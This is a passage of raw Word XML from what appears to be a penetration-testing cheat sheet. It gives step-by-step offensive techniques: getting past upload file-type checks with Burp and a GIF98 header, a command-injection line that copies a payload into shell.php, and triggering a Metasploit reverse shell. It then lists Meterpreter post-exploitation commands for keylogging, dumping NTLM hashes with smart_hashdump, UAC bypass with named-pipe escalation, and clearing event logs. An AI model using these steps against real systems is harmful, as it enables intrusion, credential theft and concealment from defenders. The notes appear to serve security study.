          <w:p w14:paraId="2632887D" w14:textId="4FFAB490" w:rsidR="00411D5E" w:rsidRDefault="00411D5E" w:rsidP="003511E3">
            <w:r>
              <w:t>Sometimes, only a picture</w:t>
            </w:r>
            <w:r w:rsidR="008F1468">
              <w:t xml:space="preserve"> (or certain file type)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> is </w:t>
            </w:r>
            <w:r w:rsidR="008F1468">
              <w:t>enforced on the file</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to be uploaded. We can get around this using burp</w:t>
            </w:r>
            <w:r w:rsidR="008F1468">
              <w:t xml:space="preserve"> (there is likely another page dedicated to burp)</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">Use burp’s proxy browser or use your own browser but have burp be a proxy so that it can capture all the html requests and use intercept mode to change the name of the file (after you’ve clicked upload) from </w:t>
            </w:r>
            <w:r w:rsidRPr="008F1468">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t xml:space="preserve">upload.php.jpg </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">to </w:t>
            </w:r>
            <w:r w:rsidRPr="008F1468">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>upload.php</w:t>
            </w:r>
            <w:r w:rsidRPr="008F1468">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E2E02" w14:paraId="73D32EAE" w14:textId="77777777" w:rsidTr="003511E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7057A442" w14:textId="21834729" w:rsidR="003E2E02" w:rsidRDefault="003E2E02" w:rsidP="003511E3">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t>.g</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6D456D63" w14:textId="6B279DF5" w:rsidR="003E2E02" w:rsidRDefault="003E2E02" w:rsidP="003511E3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>msfvenom</w:t>
            </w:r>
            <w:r w:rsidR="00F860B0">
              <w:br/>
              <w:t>Web Browser</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00F860B0">
              <w:t>msfconsole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1B826115" w14:textId="4262B094" w:rsidR="003E2E02" w:rsidRDefault="003E2E02" w:rsidP="003511E3">
            <w:r>
              <w:t>Sometimes, you can bypass security by inserting ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="008F1468">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>GIF98</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">’ at the start of the </w:t>
            </w:r>
            <w:r w:rsidRPr="008F1468">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t xml:space="preserve">upload.jpeg </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">file which is created the same way as in step .d above, but the file will be saved as </w:t>
            </w:r>
            <w:r w:rsidRPr="008F1468">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>upload.jpeg</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. Use Sublime to insert </w:t>
            </w:r>
            <w:r w:rsidRPr="008F1468">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>GIF98</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> on its own line at the start of the file.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E2E02" w14:paraId="78E83B98" w14:textId="77777777" w:rsidTr="003511E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1A5D6177" w14:textId="72B7B737" w:rsidR="003E2E02" w:rsidRDefault="003E2E02" w:rsidP="003511E3">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t>.h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0B70C808" w14:textId="77777777" w:rsidR="003E2E02" w:rsidRDefault="003E2E02" w:rsidP="003511E3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="00B69E6C" w14:textId="530BD96B" w:rsidR="003E2E02" w:rsidRDefault="003E2E02" w:rsidP="003511E3">
            <w:r>
              <w:t>Now, if there if access to command injection, use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003E2E02">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">|copy </w:t>
            </w:r>
            <w:r w:rsidRPr="003E2E02">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\wamp64\www\html\uploads\upload.jpeg </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003E2E02">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(finger-space here)</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003E2E02">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>C:\wamp64\www\html\uploads\</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>shell</w:t>
            </w:r>
            <w:r w:rsidRPr="003E2E02">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003E2E02">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(All one command)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="003E2E02">
              <w:t>You will see we have copied and pasted the upload.jpeg file into a new file called shell.php and saved it in the same location as the rest of the uploads.</w:t>
            </w:r>
            <w:r w:rsidR="00F860B0">
              <w:br/>
              <w:t>Now set up the listener in msfconsole, like in step .d above, and finally use your web browser again to trigger the shell.php to load using the same step as .e above.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028087A" w14:paraId="79BC5590" w14:textId="77777777" w:rsidTr="003511E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6E9306E5" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="003511E3"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="197C6B2A" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="003511E3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5527FA5B" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="003511E3"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48FE4E97" w14:textId="77777777" w:rsidR="00520A0D" w:rsidRDefault="00520A0D"/>
    <w:p w14:paraId="7A5FC5BE" w14:textId="16815279" w:rsidR="00520A0D" w:rsidRDefault="00520A0D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="627AAA60" w14:textId="5B7B1E0D" w:rsidR="00520A0D" w:rsidRPr="00F15476" w:rsidRDefault="00520A0D" w:rsidP="00520A0D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Specific Exploits and Escalation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E423AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MSF: Possible Privilege Escalation</w:t>
      </w:r>
      <w:r w:rsidR="00DB1D85">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | GTFOBins</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1036"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2394"/>
        <w:gridCol w:w="8022"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F62DC" w14:paraId="3F396BEA" w14:textId="77777777" w:rsidTr="00810789">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="585BCAFD" w14:textId="52D27A6E" w:rsidR="007F62DC" w:rsidRDefault="007F62DC" w:rsidP="00810789">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="548736AF" w14:textId="03D45195" w:rsidR="007F62DC" w:rsidRDefault="007F62DC" w:rsidP="00810789">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>msfconsole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="02C3F7ED" w14:textId="77777777" w:rsidR="007F62DC" w:rsidRDefault="007F62DC" w:rsidP="00810789">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B068B">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF A REMOTE CONNECTION CAN BE ESTABLISHED AND A METERPRETER SHELL IS OPEN. TRY PERFMORING THESE POSSIBLE ATTACKS.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75B58AFC" w14:textId="77777777" w:rsidR="007F62DC" w:rsidRDefault="007F62DC" w:rsidP="00810789">
            <w:r>
              <w:t>First of all, don’t forget that meterpreter has some unique commands:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001611AB">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>sysinfo</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Gather system info</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001611AB">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>getuid</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Account ID</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6249AB31" w14:textId="365B014F" w:rsidR="007F62DC" w:rsidRPr="001611AB" w:rsidRDefault="007F62DC" w:rsidP="00810789">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001611AB">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">upload </w:t>
            </w:r>
            <w:r w:rsidRPr="001611AB">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>FILE</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Uploads a file</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001611AB">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>shell</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Open a shell</w:t>
            </w:r>
            <w:r w:rsidR="00065914">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00065914">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00065914" w:rsidRPr="00065914">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">download </w:t>
            </w:r>
            <w:r w:rsidR="00065914" w:rsidRPr="00065914">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>FILE</w:t>
            </w:r>
            <w:r w:rsidR="00065914">
              <w:tab/>
              <w:t>Downloads a file</w:t>
            </w:r>
            <w:r w:rsidR="00A86965">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00A86965" w:rsidRPr="00A86965">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>idletime</w:t>
            </w:r>
            <w:r w:rsidR="00A86965">
              <w:tab/>
              <w:t>How long user is AKF</w:t>
            </w:r>
            <w:r w:rsidR="00561223">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00561223">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00561223" w:rsidRPr="00A86965">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>keyscan_start</w:t>
            </w:r>
            <w:r w:rsidR="00561223">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00A86965">
              <w:t>Starts a k</w:t>
            </w:r>
            <w:r w:rsidR="00561223">
              <w:t>eylogger</w:t>
            </w:r>
            <w:r w:rsidR="00A86965">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00A86965" w:rsidRPr="00A86965">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>keyscan_dump</w:t>
            </w:r>
            <w:r w:rsidR="00A86965">
              <w:tab/>
              <w:t>Outputs keystrokes</w:t>
            </w:r>
            <w:r w:rsidR="00A86965">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00A86965">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00A86965" w:rsidRPr="00A86965">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>shutdown</w:t>
            </w:r>
            <w:r w:rsidR="00A86965">
              <w:tab/>
              <w:t>Shuts down PC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00561223" w14:paraId="44E0A563" w14:textId="77777777" w:rsidTr="00561223">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0E0CFE33" w14:textId="40329BBE" w:rsidR="00561223" w:rsidRDefault="00561223" w:rsidP="00810789">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2380B36F" w14:textId="77777777" w:rsidR="00561223" w:rsidRDefault="00561223" w:rsidP="00810789">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1B70790D" w14:textId="13C8F1DC" w:rsidR="00561223" w:rsidRPr="007B068B" w:rsidRDefault="00561223" w:rsidP="00810789">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00561223">
              <w:t>A useful command to search for files on the remote machine is:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00561223">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">search </w:t>
            </w:r>
            <w:r w:rsidRPr="00561223">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-f </w:t>
            </w:r>
            <w:r w:rsidRPr="00561223">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">FILE.extension </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00561223">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-f</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00561223">
              <w:t>Specifies files to look for</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Useful files you may wish to search for are:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
              <w:t>pagefile.sys</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F62DC" w14:paraId="00C35AE8" w14:textId="77777777" w:rsidTr="00810789">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="18EDC62E" w14:textId="01799023" w:rsidR="007F62DC" w:rsidRDefault="007F62DC" w:rsidP="00810789">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00561223">
              <w:t>c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="74D881D7" w14:textId="77777777" w:rsidR="007F62DC" w:rsidRDefault="007F62DC" w:rsidP="00810789">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="30F9F89D" w14:textId="0D083BB8" w:rsidR="007F62DC" w:rsidRDefault="00674016" w:rsidP="00810789">
            <w:r>
              <w:t xml:space="preserve">A </w:t>
            </w:r>
            <w:r w:rsidRPr="00674016">
              <w:t>method for performing privilege escalation is to bypass the user account control setting (security configuration) using an exploit, and then to escalate the privileges using the Named Pipe Impersonation technique</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidR="007F62DC">
              <w:t>To gather NTLM password hashes and usernames, try:</w:t>
            </w:r>
            <w:r w:rsidR="007F62DC">
              <w:br/>
            </w:r>
            <w:r w:rsidR="007F62DC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007F62DC" w:rsidRPr="007F62DC">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">run </w:t>
            </w:r>
            <w:r w:rsidR="007F62DC" w:rsidRPr="007F62DC">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>post/windows/gather/smart_hashdump</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F62DC" w14:paraId="05B64FEB" w14:textId="77777777" w:rsidTr="00810789">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="02DE5575" w14:textId="737D9581" w:rsidR="007F62DC" w:rsidRDefault="007F62DC" w:rsidP="00810789">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2681120B" w14:textId="77777777" w:rsidR="007F62DC" w:rsidRDefault="007F62DC" w:rsidP="00810789">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="409DEDBD" w14:textId="5BDE83F4" w:rsidR="007F62DC" w:rsidRDefault="007F62DC" w:rsidP="00810789">
            <w:r>
              <w:t>To clear event logs (requires root privileges):</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007F62DC">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>clearev</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F62DC" w14:paraId="6F6618FF" w14:textId="77777777" w:rsidTr="00810789">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="296E7C7D" w14:textId="5039E0B7" w:rsidR="007F62DC" w:rsidRDefault="007F62DC" w:rsidP="00810789">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:t>.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
